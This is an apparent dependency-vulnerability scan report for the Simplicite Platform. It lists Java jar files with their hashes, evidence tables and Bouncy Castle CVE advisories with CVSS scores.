avalon-framework-impl-4.2.0.jarFile Path: /var/simplicite/.m2/repository/avalon-framework/avalon-framework-impl/4.2.0/avalon-framework-impl-4.2.0.jarMD5: 5c1f8f5c8c6c043538fc4ea038c2aaf6SHA1: 4da1db18947eb6950abb7ad79253011b9aec0e48SHA256: ed42c573cab460ca634b5c64a3b40ed1d67d6ee47fe25f87947370bede6af814Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name avalon-framework-impl High Vendor jar package name apache Highest Vendor jar package name avalon Highest Vendor jar package name framework Highest Vendor Manifest extension-name avalon-framework-impl Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid avalon-framework-impl Highest Vendor pom artifactid avalon-framework-impl Low Vendor pom groupid avalon-framework Highest Product file name avalon-framework-impl High Product jar package name avalon Highest Product jar package name framework Highest Product Manifest extension-name avalon-framework-impl Medium Product Manifest Implementation-Title High Product Manifest specification-title Avalon Framework Implementation Medium Product pom artifactid avalon-framework-impl Highest Product pom groupid avalon-framework Highest Version file version 4.2.0 High Version Manifest Implementation-Version 4.2.0 High Version pom version 4.2.0 Highest
aws-s3-2.2.0.jarDescription:
Simple Storage Service (S3) implementation targeted to Amazon Web Services License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/provider/aws-s3/2.2.0/aws-s3-2.2.0.jar
MD5: e0888fec8e07a0030b16eed4fb4c2014
SHA1: 09a357c4d48dc2cc1cfe52a09d15794f6c7c84dd
SHA256: fc971624321f1945574ba23e3dc1327c9d946c1f4c30a50588f75013795154e8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name aws-s3 High Vendor jar package name aws Highest Vendor jar package name jclouds Highest Vendor jar package name s3 Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname aws-s3 Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid aws-s3 Highest Vendor pom artifactid aws-s3 Low Vendor pom groupid org.apache.jclouds.provider Highest Vendor pom name jclouds Amazon Simple Storage Service (S3) provider High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name aws-s3 High Product jar package name aws Highest Product jar package name jclouds Highest Product jar package name s3 Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Amazon Simple Storage Service (S3) provider Medium Product Manifest bundle-symbolicname aws-s3 Medium Product Manifest Implementation-Title jclouds Amazon Simple Storage Service (S3) provider High Product Manifest specification-title jclouds jclouds Amazon Simple Storage Service (S3) provider Medium Product pom artifactid aws-s3 Highest Product pom groupid org.apache.jclouds.provider Highest Product pom name jclouds Amazon Simple Storage Service (S3) provider High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
azureblob-2.2.0.jarDescription:
jclouds components to access Azure Blob Service License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/provider/azureblob/2.2.0/azureblob-2.2.0.jar
MD5: 6e496c24207ed776f9a933a558d878c6
SHA1: 724f1331e5124dc17621f5417df4c74ee1940be7
SHA256: 17910ad862f1f61ed87875cd735b137c8a7cdeb69f9754448e0004592094f78f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name azureblob High Vendor jar package name azure Highest Vendor jar package name azureblob Highest Vendor jar package name jclouds Highest Vendor jar package name storage Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname azureblob Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid azureblob Highest Vendor pom artifactid azureblob Low Vendor pom groupid org.apache.jclouds.provider Highest Vendor pom name jclouds Azure Storage provider High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name azureblob High Product jar package name azure Highest Product jar package name azureblob Highest Product jar package name jclouds Highest Product jar package name storage Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Azure Storage provider Medium Product Manifest bundle-symbolicname azureblob Medium Product Manifest Implementation-Title jclouds Azure Storage provider High Product Manifest specification-title jclouds jclouds Azure Storage provider Medium Product pom artifactid azureblob Highest Product pom groupid org.apache.jclouds.provider Highest Product pom name jclouds Azure Storage provider High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
barcode4j-2.1.jarDescription:
Barcode4J is a flexible generator for barcodes written in Java. License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/net/sf/barcode4j/barcode4j/2.1/barcode4j-2.1.jar
MD5: 4fc30cdb7b1abaf1ce08f26b0666e351
SHA1: 4b38b2219c0d522fcea8238493f2ea3e238ef529
SHA256: eb7252cc41a1539bcd018348e9f60e0942872bdaa49c58051e656a6be94969fb
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name barcode4j High Vendor jar package name barcode4j Highest Vendor jar package name krysalis Highest Vendor Manifest bundle-docurl http://barcode4j.sourceforge.net Low Vendor Manifest bundle-symbolicname org.krysalis.barcode4j Medium Vendor Manifest implementation-url http://barcode4j.sourceforge.net Low Vendor Manifest Implementation-Vendor The Barcode4J Project High Vendor pom artifactid barcode4j Highest Vendor pom artifactid barcode4j Low Vendor pom developer email buerkle@users.sourceforge.net Low Vendor pom developer email jmaerki@users.sourceforge.net Low Vendor pom developer email nicolaken@krysalis.org Low Vendor pom developer email the_webmaestro@users.sourceforge.net Low Vendor pom developer id buerkle Medium Vendor pom developer id jmaerki Medium Vendor pom developer id nicolaken Medium Vendor pom developer id the_webmaestro Medium Vendor pom developer name Dietmar Bürkle Medium Vendor pom developer name Jeremias Märki Medium Vendor pom developer name Nicola Ken Barozzi Medium Vendor pom developer name Web Maestro Clay Leeds Medium Vendor pom groupid net.sf.barcode4j Highest Vendor pom name Barcode4J High Vendor pom url http://barcode4j.sourceforge.net Highest Product file name barcode4j High Product jar package name barcode4j Highest Product jar package name krysalis Highest Product Manifest bundle-docurl http://barcode4j.sourceforge.net Low Product Manifest Bundle-Name Barcode4J Medium Product Manifest bundle-symbolicname org.krysalis.barcode4j Medium Product Manifest Implementation-Title Barcode4J Library High Product Manifest implementation-url http://barcode4j.sourceforge.net Low Product pom artifactid barcode4j Highest Product pom developer email buerkle@users.sourceforge.net Low Product pom developer email jmaerki@users.sourceforge.net Low Product pom developer email nicolaken@krysalis.org Low Product pom developer email the_webmaestro@users.sourceforge.net Low Product pom developer id buerkle Low Product pom developer id jmaerki Low Product pom developer id nicolaken Low Product pom developer id the_webmaestro Low Product pom developer name Dietmar Bürkle Low Product pom developer name Jeremias Märki Low Product pom developer name Nicola Ken Barozzi Low Product pom developer name Web Maestro Clay Leeds Low Product pom groupid net.sf.barcode4j Highest Product pom name Barcode4J High Product pom url http://barcode4j.sourceforge.net Medium Version file version 2.1 High Version pom version 2.1 Highest
base64-2.3.8.jarDescription:
A Java class providing very fast Base64 encoding and decoding
in the form of convenience methods and input/output streams.
License:
Public domain File Path: /var/simplicite/.m2/repository/net/iharder/base64/2.3.8/base64-2.3.8.jar
MD5: 9a9828f0caa016a2f3e0c90fe3af771b
SHA1: 7d2e2cea90cc51169fd02a35888820ab07f6d02f
SHA256: bbf41fda22877a538f6bc2d5ad0aa372a7ddf4a756af3386aa09d3d4eea84f7f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name base64 High Vendor jar package name base64 Highest Vendor jar package name iharder Highest Vendor jar package name iharder Low Vendor jar package name net Highest Vendor jar package name net Low Vendor pom artifactid base64 Highest Vendor pom artifactid base64 Low Vendor pom developer email omalley@apache.org Low Vendor pom developer email rob@iharder.net Low Vendor pom developer id omalley Medium Vendor pom developer id rharder Medium Vendor pom developer name Owen O'Malley Medium Vendor pom developer name Robert Harder Medium Vendor pom groupid net.iharder Highest Vendor pom name base64 High Vendor pom url http://iharder.net/base64/ Highest Product file name base64 High Product jar package name base64 Highest Product jar package name iharder Highest Product jar package name iharder Low Product jar package name net Highest Product pom artifactid base64 Highest Product pom developer email omalley@apache.org Low Product pom developer email rob@iharder.net Low Product pom developer id omalley Low Product pom developer id rharder Low Product pom developer name Owen O'Malley Low Product pom developer name Robert Harder Low Product pom groupid net.iharder Highest Product pom name base64 High Product pom url http://iharder.net/base64/ Medium Version file version 2.3.8 High Version pom version 2.3.8 Highest
bcmail-jdk15on-1.63.jarDescription:
The Bouncy Castle Java S/MIME APIs for handling S/MIME protocols. This jar contains S/MIME APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs. The JavaMail API and the Java activation framework will also be needed. License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcmail-jdk15on/1.63/bcmail-jdk15on-1.63.jar
MD5: 2ff3d5ba2e923c1030401cd7e91dd2bd
SHA1: aa0f31cf8d4717aa213539d469478220d679357f
SHA256: 6078638744a1b3ce842fd70330681c058ad9aa278696dc71c430b4d6449501c3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcmail-jdk15on High Vendor jar package name bouncycastle Highest Vendor jar package name mail Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle S/MIME API Medium Vendor Manifest automatic-module-name org.bouncycastle.mail Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcmail Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcmail Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcmail-jdk15on Highest Vendor pom artifactid bcmail-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle S/MIME API High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcmail-jdk15on High Product jar package name bouncycastle Highest Product jar package name mail Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle S/MIME API Medium Product Manifest automatic-module-name org.bouncycastle.mail Medium Product Manifest Bundle-Name bcmail Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcmail Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcmail Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcmail-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle S/MIME API High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
pkg:maven/org.bouncycastle/bcmail-jdk15on@1.63 (Confidence :High)cpe:2.3:a:bouncycastle:bouncy_castle_for_java:1.63:*:*:*:*:*:*:* (Confidence :Low) suppress cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle:1.63:*:*:*:*:*:*:* (Confidence :Low) suppress CVE-2023-33202 suppress
Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.) CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
bcpg-jdk15on-1.63.jarDescription:
The Bouncy Castle Java API for handling the OpenPGP protocol. This jar contains the OpenPGP API for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs. License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
Apache Software License, Version 1.1: http://www.apache.org/licenses/LICENSE-1.1 File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcpg-jdk15on/1.63/bcpg-jdk15on-1.63.jar
MD5: c551097b29b7d81bc5ae1184a6bcc7c6
SHA1: a93a004e30ba70feb94213bd9adb3bb5295361ef
SHA256: dc4f51adfc46583c2543489c82708fef5660202bf264c7cd453f081a117ea536
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcpg-jdk15on High Vendor jar package name bcpg Highest Vendor jar package name bouncycastle Highest Vendor jar package name openpgp Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle OpenPGP API Medium Vendor Manifest automatic-module-name org.bouncycastle.pg Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcpg Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcpg Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcpg-jdk15on Highest Vendor pom artifactid bcpg-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle OpenPGP API High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcpg-jdk15on High Product jar package name bcpg Highest Product jar package name bouncycastle Highest Product jar package name openpgp Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle OpenPGP API Medium Product Manifest automatic-module-name org.bouncycastle.pg Medium Product Manifest Bundle-Name bcpg Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcpg Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcpg Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcpg-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle OpenPGP API High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
pkg:maven/org.bouncycastle/bcpg-jdk15on@1.63 (Confidence :High)cpe:2.3:a:bouncycastle:bouncy_castle_for_java:1.63:*:*:*:*:*:*:* (Confidence :Low) suppress cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle:1.63:*:*:*:*:*:*:* (Confidence :Low) suppress CVE-2023-33202 suppress
Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.) CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
bcpkix-jdk15on-1.63.jarDescription:
The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs. License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcpkix-jdk15on/1.63/bcpkix-jdk15on-1.63.jar
MD5: c7dc9b66a0535f44dd088babea47b506
SHA1: 81e2a6d531213271dd936e4a94a041d49e4721e8
SHA256: e9e6a1a9c411681100dce967b6a8e66f4a0bbdc8ae18379a0044dd0e19b888b0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcpkix-jdk15on High Vendor jar package name bouncycastle Highest Vendor jar package name cmp Highest Vendor jar package name cms Highest Vendor jar package name crmf Highest Vendor jar package name eac Highest Vendor jar package name ocsp Highest Vendor jar package name pkcs Highest Vendor jar package name pkix Highest Vendor jar package name tsp Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle PKIX API Medium Vendor Manifest automatic-module-name org.bouncycastle.pkix Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcpkix Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcpkix Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcpkix-jdk15on Highest Vendor pom artifactid bcpkix-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle PKIX, CMS, EAC, TSP, PKCS, OCSP, CMP, and CRMF APIs High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcpkix-jdk15on High Product jar package name bouncycastle Highest Product jar package name cmp Highest Product jar package name cms Highest Product jar package name crmf Highest Product jar package name eac Highest Product jar package name ocsp Highest Product jar package name pkcs Highest Product jar package name pkix Highest Product jar package name tsp Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle PKIX API Medium Product Manifest automatic-module-name org.bouncycastle.pkix Medium Product Manifest Bundle-Name bcpkix Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcpkix Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcpkix Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcpkix-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle PKIX, CMS, EAC, TSP, PKCS, OCSP, CMP, and CRMF APIs High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.63 (Confidence :High)cpe:2.3:a:bouncycastle:bouncy_castle_for_java:1.63:*:*:*:*:*:*:* (Confidence :Low) suppress cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle:1.63:*:*:*:*:*:*:* (Confidence :Low) suppress CVE-2023-33202 suppress
Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.) CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
bcprov-jdk15on-1.63.jarDescription:
The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8. License:
Bouncy Castle Licence: http://www.bouncycastle.org/licence.html File Path: /var/simplicite/.m2/repository/org/bouncycastle/bcprov-jdk15on/1.63/bcprov-jdk15on-1.63.jar
MD5: d357114f1605c034ebcb99f3c9d36f7e
SHA1: c996f9c64dc0e94e2d2ae962cc7b7cad7744fcc8
SHA256: 28155c8695934f666fabc235f992096e40d97ecb044d5b6b0902db6e15a0b72f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bcprov-jdk15on High Vendor jar package name bouncycastle Highest Vendor jar package name crypto Highest Vendor jar package name jce Highest Vendor jar package name provider Highest Vendor Manifest application-library-allowable-codebase * Low Vendor Manifest application-name Bouncy Castle Provider Medium Vendor Manifest automatic-module-name org.bouncycastle.provider Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname bcprov Medium Vendor Manifest caller-allowable-codebase * Low Vendor Manifest codebase * Low Vendor Manifest extension-name org.bouncycastle.bcprovider Medium Vendor Manifest Implementation-Vendor BouncyCastle.org High Vendor Manifest Implementation-Vendor-Id org.bouncycastle Medium Vendor Manifest multi-release true Low Vendor Manifest originally-created-by 25.222-b10 (Private Build) Low Vendor Manifest permissions all-permissions Low Vendor Manifest specification-vendor BouncyCastle.org Low Vendor Manifest trusted-library true Low Vendor pom artifactid bcprov-jdk15on Highest Vendor pom artifactid bcprov-jdk15on Low Vendor pom developer email feedback-crypto@bouncycastle.org Low Vendor pom developer id feedback-crypto Medium Vendor pom developer name The Legion of the Bouncy Castle Inc. Medium Vendor pom groupid org.bouncycastle Highest Vendor pom name Bouncy Castle Provider High Vendor pom url http://www.bouncycastle.org/java.html Highest Product file name bcprov-jdk15on High Product hint analyzer product legion-of-the-bouncy-castle-java-crytography-api High Product hint analyzer product the_bouncy_castle_crypto_package_for_java High Product jar package name bouncycastle Highest Product jar package name crypto Highest Product jar package name jce Highest Product jar package name provider Highest Product Manifest application-library-allowable-codebase * Low Product Manifest application-name Bouncy Castle Provider Medium Product Manifest automatic-module-name org.bouncycastle.provider Medium Product Manifest Bundle-Name bcprov Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname bcprov Medium Product Manifest caller-allowable-codebase * Low Product Manifest codebase * Low Product Manifest extension-name org.bouncycastle.bcprovider Medium Product Manifest multi-release true Low Product Manifest originally-created-by 25.222-b10 (Private Build) Low Product Manifest permissions all-permissions Low Product Manifest trusted-library true Low Product pom artifactid bcprov-jdk15on Highest Product pom developer email feedback-crypto@bouncycastle.org Low Product pom developer id feedback-crypto Low Product pom developer name The Legion of the Bouncy Castle Inc. Low Product pom groupid org.bouncycastle Highest Product pom name Bouncy Castle Provider High Product pom url http://www.bouncycastle.org/java.html Medium Version file version 1.63 High Version Manifest Bundle-Version 1.63 High Version pom version 1.63 Highest
CVE-2019-17359 suppress
The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-15522 suppress
Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.1.2, 1.0.2.1, and BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures. CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2020-0187 (OSSINDEX) suppress
In engineSetMode of BaseBlockCipher.java, there is a possible incorrect cryptographic algorithm chosen due to an incomplete comparison. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-148517383 CWE-310 Cryptographic Issues
CVSSv2:
Base Score: MEDIUM (5.5) Vector: /AV:L/AC:L/Au:/C:H/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.bouncycastle:bcprov-jdk15on:1.63:*:*:*:*:*:*:* CVE-2023-33201 (OSSINDEX) suppress
Bouncy Castle For Java before 1.74 is affected by an LDAP injection vulnerability. The vulnerability only affects applications that use an LDAP CertStore from Bouncy Castle to validate X.509 certificates. During the certificate validation process, Bouncy Castle inserts the certificate's Subject Name into an LDAP search filter without any escaping, which leads to an LDAP injection vulnerability. CWE-295 Improper Certificate Validation
CVSSv2:
Base Score: MEDIUM (5.3) Vector: /AV:N/AC:L/Au:/C:L/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.bouncycastle:bcprov-jdk15on:1.63:*:*:*:*:*:*:* boilerpipe-1.1.0.jarDescription:
The boilerpipe library provides algorithms to detect and remove the surplus "clutter" (boilerplate, templates) around the main textual content of a web page.
The library already provides specific strategies for common tasks (for example: news article extraction) and may also be easily extended for individual problem settings.
Extracting content is very fast (milliseconds), just needs the input document (no global or site-level information required) and is usually quite accurate.
Boilerpipe is a Java library written by Christian Kohlschütter. It is released under the Apache License 2.0.
The algorithms used by the library are based on (and extending) some concepts of the paper "Boilerplate Detection using Shallow Text Features" by Christian Kohlschütter et al., presented at WSDM 2010 -- The Third ACM International Conference on Web Search and Data Mining New York City, NY USA.
License:
Apache License 2.0 File Path: /var/simplicite/.m2/repository/de/l3s/boilerpipe/boilerpipe/1.1.0/boilerpipe-1.1.0.jar
MD5: 0616568083786d0f49e2cb07a5d09fe4
SHA1: f62cb75ed52455a9e68d1d05b84c500673340eb2
SHA256: 088203df4326c4dcc42cec1253a2b41e03dc8904984eae744543b48e2cc63846
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name boilerpipe High Vendor jar package name boilerpipe Highest Vendor jar package name boilerpipe Low Vendor jar package name de Highest Vendor jar package name de Low Vendor jar package name document Highest Vendor jar package name html Highest Vendor jar package name l3s Highest Vendor jar package name l3s Low Vendor pom artifactid boilerpipe Highest Vendor pom artifactid boilerpipe Low Vendor pom developer name Christian Kohlschütter Medium Vendor pom groupid de.l3s.boilerpipe Highest Vendor pom name Boilerpipe -- Boilerplate Removal and Fulltext Extraction from HTML pages High Vendor pom url http://code.google.com/p/boilerpipe/ Highest Product file name boilerpipe High Product jar package name boilerpipe Highest Product jar package name boilerpipe Low Product jar package name de Highest Product jar package name document Highest Product jar package name html Highest Product jar package name l3s Highest Product jar package name l3s Low Product pom artifactid boilerpipe Highest Product pom developer name Christian Kohlschütter Low Product pom groupid de.l3s.boilerpipe Highest Product pom name Boilerpipe -- Boilerplate Removal and Fulltext Extraction from HTML pages High Product pom url http://code.google.com/p/boilerpipe/ Medium Version file version 1.1.0 High Version pom version 1.1.0 Highest
bson-3.11.0.jarDescription:
The BSON library License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/mongodb/bson/3.11.0/bson-3.11.0.jar
MD5: fee103bbdf1b62541826f1fff8c75166
SHA1: 5f00c5a8f05b66a33239efd1131aaef5a49ba5b8
SHA256: 87015c5e3d35ae0e1593a89adacaa744c265ba617a4e045252a0e67855998c4d
Referenced In Project/Scope: Simplicite Platform:runtime
